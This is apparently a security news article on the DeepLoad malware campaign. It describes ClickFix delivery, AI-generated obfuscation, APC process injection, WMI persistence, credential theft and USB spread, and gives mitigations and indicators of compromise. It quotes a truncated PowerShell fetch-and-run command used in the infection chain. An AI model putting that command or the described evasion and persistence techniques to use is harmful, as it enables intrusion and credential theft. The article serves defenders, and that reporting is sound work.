DeepLoad Malware Uses AI-Generated Code to Evade Detection
New DeepLoad malware combines ClickFix delivery with AI-generated obfuscation to bypass security scanners. WMI persistence survives remediation for days.
A new malware strain called DeepLoad is breaching enterprise networks through ClickFix social engineering, then using AI-generated code obfuscation to evade detection—and its WMI persistence mechanism has been observed reinfecting systems days after apparent cleanup.
Security researchers at ReliaQuest published detailed analysis on March 30 documenting how DeepLoad turns a single user action into rapid, fileless compromise. The malware first appeared on dark web forums in early February, advertised as "a centralized panel for multiple types of malware."
How the Attack Works
DeepLoad's infection chain begins with ClickFix—a social engineering technique that's grown increasingly common in 2026. Victims encounter fake browser error messages or phishing pages that instruct them to paste a command into Windows Run or PowerShell to "fix" the issue.
The command executes: powershell.exe -ep Bypass -Command "iex(irm...)" which establishes persistent scheduled tasks and deploys obfuscated PowerShell loaders via mshta.exe. From that single action, attackers gain reboot-surviving access with minimal further interaction required.
AI-Generated Evasion at Scale
What sets DeepLoad apart is its obfuscation layer. The loader buries functional code under thousands of meaningless variable assignments specifically designed to exhaust static analysis engines.
"The sheer volume of padding likely rules out a human author," the ReliaQuest report states. Assessment indicates AI likely generated this obfuscation, marking a concerning evolution in malware development techniques.
The evasion techniques include:
- Dynamic DLL compilation using PowerShell's Add-Type feature with randomized filenames
- Command history disabling and direct Windows API calls that bypass monitoring hooks
- XOR decryption of in-memory shellcode that's never written to disk
Process Injection Targets Overlooked Processes
DeepLoad uses asynchronous procedure call (APC) injection to execute payloads within trusted Windows processes. The malware deliberately targets three specific processes: LockAppHost.exe (Windows lock screen), makecab.exe, and Magnify.exe.
These aren't random choices. Security teams typically overlook these processes during threat hunting, making them ideal hiding spots for malicious activity.
WMI Persistence Survives Remediation
The most dangerous aspect of DeepLoad is its persistence mechanism. Standard incident response removes scheduled tasks and temporary files—but DeepLoad exploits WMI event subscriptions that most cleanup procedures miss entirely.
In documented cases, reinfection occurred three days after hosts appeared clean, with "no user action and no attacker interaction required." The WMI subscription simply re-triggered the infection chain automatically.
This mirrors persistence techniques we've seen in other recent campaigns, including the AuraStealer infrastructure that used similar methods to maintain access across reboots.
Dual Credential Harvesting
DeepLoad employs two parallel approaches to stealing credentials:
- A standalone stealer component (filemanager.exe) that accesses stored browser passwords
- A malicious browser extension that intercepts credentials as users type them
The extension is particularly dangerous—it persists across browser sessions and captures "everything a user does, putting active logins, open tabs, session tokens and saved passwords at risk."
USB Propagation Expands the Attack Surface
Infected hosts automatically copy DeepLoad to connected USB drives. Within minutes, the malware writes over 40 files disguised as legitimate installers—Chrome, Firefox, and AnyDesk setup files—in an apparent effort to trick users on other machines into running them.
This USB propagation is tracked separately in the command-and-control infrastructure, suggesting deliberate design for lateral spread within organizations.
Detection and Mitigation
Organizations should implement these controls to detect and prevent DeepLoad infections:
- Enable PowerShell Script Block Logging to capture decoded commands at runtime
- Audit WMI subscriptions in routine security operations—this is where most teams fail
- Monitor behavioral indicators including process injection and APC calls
- Watch network traffic for unexpected mshta.exe outbound connections and unusual LockAppHost.exe activity
Security teams must also rotate all credentials from affected hosts and treat any connected removable media as potentially compromised.
Indicators of Compromise
| Artifact | Value |
|---|---|
| filemanager.exe | 1432393691b415d0cd4680d9cee73e60896fbe63300d9f0355c96e91817e4b1d |
| domain-resolver.js | 6AABA685669D779EF8BE8F7F4231096CFAFD0EF386F3897C5E2106C177724FC8 |
| Staging domains | holiday-updateservice[.]com, forest-entity[.]cc |
| C2 infrastructure | hell1-kitty[.]cc |
Why This Matters
DeepLoad represents a troubling convergence of trends: AI-assisted malware development, social engineering that exploits user trust, and persistence mechanisms that outlast standard remediation procedures.
The combination of ClickFix delivery—which bypasses email security entirely by making users infect themselves—with WMI persistence that survives typical incident response creates a particularly resilient threat. Organizations that discover DeepLoad infections should assume their initial cleanup was insufficient and specifically audit for WMI event subscriptions.
For defenders tracking the broader malware landscape, DeepLoad demonstrates that threat actors are actively incorporating AI tooling into their development pipelines—not for autonomous attacks, but for automating the tedious work of code obfuscation at scale.
Related Articles
AuraStealer Spreads via TikTok ClickFix Scams, Targets 110+ Browsers
Russian-linked AuraStealer infostealer uses TikTok videos and 48 C2 domains to steal credentials. ABE bypass defeats Chrome's cookie encryption.
Mar 16, 2026Stolen Credentials Fuel Self-Sustaining Malware Distribution
Hudson Rock research reveals 220 legitimate business websites hijacked for ClickFix malware attacks after admin credentials were stolen by infostealers.
Jan 5, 2026Axios npm Hijack Drops Cross-Platform RAT on 100M+ Installs
Attackers compromised the Axios npm package to deploy a cross-platform RAT targeting Windows, macOS, and Linux. Here's what happened and what you need to do.
Mar 31, 2026Vidar Infostealer Spreads via Hacked WordPress Sites
Malwarebytes researchers detected a Vidar infostealer campaign using fake CAPTCHA pages on compromised WordPress sites. ClickFix technique tricks users into running malicious PowerShell.
Mar 28, 2026